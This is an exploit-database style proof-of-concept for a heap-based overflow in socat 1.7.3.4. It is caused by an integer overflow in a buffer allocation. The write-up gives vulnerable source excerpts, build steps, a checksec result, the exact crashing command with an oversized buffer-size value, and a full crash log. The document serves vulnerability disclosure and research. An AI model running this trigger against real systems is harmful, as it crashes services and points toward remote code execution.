# Exploit Title: Socat 1.7.3.4 - Heap Based Overflow (PoC) # Date: 2020-02-03 # Exploit Author: hieubl from HPT Cyber Security # Vendor Homepage: http://www.dest-unreach.org/ # Software Link: http://www.dest-unreach.org/socat/ # Version: 1.7.3.4 # Tested on: Ubuntu 16.04.6 LTS # CVE : # Heap-Based Overflow due to Integer Overflow and Lack of PIE mitigation (PoC) ------- [***Description***] ------- The source code of socat.c contains _socat() function which has the Integer Overflow vulnerability: int _socat(void) { ... unsigned char *buff; ... buff = Malloc(2*socat_opts.bufsiz+1) ... } After that, the the line of code "if ((bytes2 = xiotransfer(sock2, sock1, &buff, socat_opts.bufsiz, true)) < 0) {" calls the xiotransfer() function. The xiotransfer() function calls xioread() function. Finally xioread() function calls Read() function. ssize_t xioread(xiofile_t *file, void *buff, size_t bufsiz) { ... Read(pipe->fd, buff, bufsiz); //[***!!!This line of code leads to Heap-Based Overflow vulnerability***!!!] ... } In addition, the "Makefile" file does not turn on the Position Independent Executables (PIE) mitigation (the CFLAGS does not contains "-pie" flag). By default, Ubuntu 16.04 does not turn on this mitigation. Consequently, it is easier to exploit the program, may even lead to Remode Code Execution (RCE). Reference: https://hackerone.com/reports/415272, $100 bounty for Linux Desktop application slack executable does not use pie / no ASLR ------- [***Download and build***] ------- Download link: http://www.dest-unreach.org/socat/download/socat-1.7.3.4.tar.gz $ tar xzvf socat-1.7.3.4.tar.gz $ cd socat-1.7.3.4/ $ ./configure Modify "Makefile" file: "CFLAGS = -g -O -D_GNU_SOURCE -Wall -Wno-parentheses $(CCOPTS) $(DEFS) $(CPPFLAGS)" (add "-g" flag for debugging purpose) $ make $ sudo make install ------- [***Proof of Concept***] ------- $ checksec socat [*] '/home/natsu/temp/socat-1.7.3.4/socat' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) FORTIFY: Enabled >>> There is no PIE mitigation! $ python -c 'print "A"*1000000' > a $ touch b $ socat -b9223372036854775888 OPEN:a,readbytes=1000000 OPEN:b,readbytes=1000000 This proof of concept triggers the bugs by setting the buffer size to 0x8000000000000050(9223372036854775888 in decimal). Therefore, the malloc size is passed to "Malloc(2*socat_opts.bufsiz+1)" is 0x100000000000000a0. This is equivalent to Malloc(0xa0). The readbytes("readbytes=1000000") controls the size of reading (we cannot read with the size too large as 0x8000000000000050) with these lines of code: if (pipe->readbytes) { if (pipe->actbytes == 0) { return 0; } if (pipe->actbytes < bufsiz) { bufsiz = pipe->actbytes; } } ------- [***Crash logs***] ------- *** Error in `socat': free(): invalid next size (normal): 0x000000000106a110 *** ======= Backtrace: ========= /lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7fc0ee5817e5] /lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7fc0ee58a37a] /lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7fc0ee58e53c] socat[0x407e3f] socat[0x4084c6] socat[0x408f7a] /lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7fc0ee52a830] socat[0x4057a9] ======= Memory map: ======== 00400000-0044a000 r-xp 00000000 08:01 655643 /usr/local/bin/socat 00649000-0064a000 r--p 00049000 08:01 655643 /usr/local/bin/socat 0064a000-0064b000 rw-p 0004a000 08:01 655643 /usr/local/bin/socat 0064b000-0068c000 rw-p 00000000 00:00 0 01069000-0108a000 rw-p 00000000 00:00 0 [heap] 7fc0e8000000-7fc0e8021000 rw-p 00000000 00:00 0 7fc0e8021000-7fc0ec000000 ---p 00000000 00:00 0 7fc0eded3000-7fc0edee9000 r-xp 00000000 08:01 397801 /lib/x86_64-linux-gnu/libgcc_s.so.1 7fc0edee9000-7fc0ee0e8000 ---p 00016000 08:01 397801 /lib/x86_64-linux-gnu/libgcc_s.so.1 7fc0ee0e8000-7fc0ee0e9000 rw-p 00015000 08:01 397801 /lib/x86_64-linux-gnu/libgcc_s.so.1 7fc0ee0e9000-7fc0ee0ec000 r-xp 00000000 08:01 397787 /lib/x86_64-linux-gnu/libdl-2.23.so 7fc0ee0ec000-7fc0ee2eb000 ---p 00003000 08:01 397787 /lib/x86_64-linux-gnu/libdl-2.23.so 7fc0ee2eb000-7fc0ee2ec000 r--p 00002000 08:01 397787 /lib/x86_64-linux-gnu/libdl-2.23.so 7fc0ee2ec000-7fc0ee2ed000 rw-p 00003000 08:01 397787 /lib/x86_64-linux-gnu/libdl-2.23.so 7fc0ee2ed000-7fc0ee305000 r-xp 00000000 08:01 397909 /lib/x86_64-linux-gnu/libpthread-2.23.so 7fc0ee305000-7fc0ee504000 ---p 00018000 08:01 397909 /lib/x86_64-linux-gnu/libpthread-2.23.so 7fc0ee504000-7fc0ee505000 r--p 00017000 08:01 397909 /lib/x86_64-linux-gnu/libpthread-2.23.so 7fc0ee505000-7fc0ee506000 rw-p 00018000 08:01 397909 /lib/x86_64-linux-gnu/libpthread-2.23.so 7fc0ee506000-7fc0ee50a000 rw-p 00000000 00:00 0 7fc0ee50a000-7fc0ee6ca000 r-xp 00000000 08:01 397763 /lib/x86_64-linux-gnu/libc-2.23.so 7fc0ee6ca000-7fc0ee8ca000 ---p 001c0000 08:01 397763 /lib/x86_64-linux-gnu/libc-2.23.so 7fc0ee8ca000-7fc0ee8ce000 r--p 001c0000 08:01 397763 /lib/x86_64-linux-gnu/libc-2.23.so 7fc0ee8ce000-7fc0ee8d0000 rw-p 001c4000 08:01 397763 /lib/x86_64-linux-gnu/libc-2.23.so 7fc0ee8d0000-7fc0ee8d4000 rw-p 00000000 00:00 0 7fc0ee8d4000-7fc0eeaef000 r-xp 00000000 08:01 397619 /lib/x86_64-linux-gnu/libcrypto.so.1.0.0 7fc0eeaef000-7fc0eecee000 ---p 0021b000 08:01 397619 /lib/x86_64-linux-gnu/libcrypto.so.1.0.0 7fc0eecee000-7fc0eed0a000 r--p 0021a000 08:01 397619 /lib/x86_64-linux-gnu/libcrypto.so.1.0.0 7fc0eed0a000-7fc0eed16000 rw-p 00236000 08:01 397619 /lib/x86_64-linux-gnu/libcrypto.so.1.0.0 7fc0eed16000-7fc0eed19000 rw-p 00000000 00:00 0 7fc0eed19000-7fc0eed77000 r-xp 00000000 08:01 397620 /lib/x86_64-linux-gnu/libssl.so.1.0.0 7fc0eed77000-7fc0eef77000 ---p 0005e000 08:01 397620 /lib/x86_64-linux-gnu/libssl.so.1.0.0 7fc0eef77000-7fc0eef7b000 r--p 0005e000 08:01 397620 /lib/x86_64-linux-gnu/libssl.so.1.0.0 7fc0eef7b000-7fc0eef82000 rw-p 00062000 08:01 397620 /lib/x86_64-linux-gnu/libssl.so.1.0.0 7fc0eef82000-7fc0eef84000 r-xp 00000000 08:01 397944 /lib/x86_64-linux-gnu/libutil-2.23.so 7fc0eef84000-7fc0ef183000 ---p 00002000 08:01 397944 /lib/x86_64-linux-gnu/libutil-2.23.so 7fc0ef183000-7fc0ef184000 r--p 00001000 08:01 397944 /lib/x86_64-linux-gnu/libutil-2.23.so 7fc0ef184000-7fc0ef185000 rw-p 00002000 08:01 397944 /lib/x86_64-linux-gnu/libutil-2.23.so 7fc0ef185000-7fc0ef18c000 r-xp 00000000 08:01 397917 /lib/x86_64-linux-gnu/librt-2.23.so 7fc0ef18c000-7fc0ef38b000 ---p 00007000 08:01 397917 /lib/x86_64-linux-gnu/librt-2.23.so 7fc0ef38b000-7fc0ef38c000 r--p 00006000 08:01 397917 /lib/x86_64-linux-gnu/librt-2.23.so 7fc0ef38c000-7fc0ef38d000 rw-p 00007000 08:01 397917 /lib/x86_64-linux-gnu/librt-2.23.so 7fc0ef38d000-7fc0ef3b3000 r-xp 00000000 08:01 397735 /lib/x86_64-linux-gnu/ld-2.23.so 7fc0ef594000-7fc0ef59a000 rw-p 00000000 00:00 0 7fc0ef5b1000-7fc0ef5b2000 rw-p 00000000 00:00 0 7fc0ef5b2000-7fc0ef5b3000 r--p 00025000 08:01 397735 /lib/x86_64-linux-gnu/ld-2.23.so 7fc0ef5b3000-7fc0ef5b4000 rw-p 00026000 08:01 397735 /lib/x86_64-linux-gnu/ld-2.23.so 7fc0ef5b4000-7fc0ef5b5000 rw-p 00000000 00:00 0 7ffe11dd9000-7ffe11dfa000 rw-p 00000000 00:00 0 [stack] 7ffe11dfb000-7ffe11dfe000 r--p 00000000 00:00 0 [vvar] 7ffe11dfe000-7ffe11e00000 r-xp 00000000 00:00 0 [vdso] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] 2020/02/04 05:33:00 socat[47233] E exiting on signal 6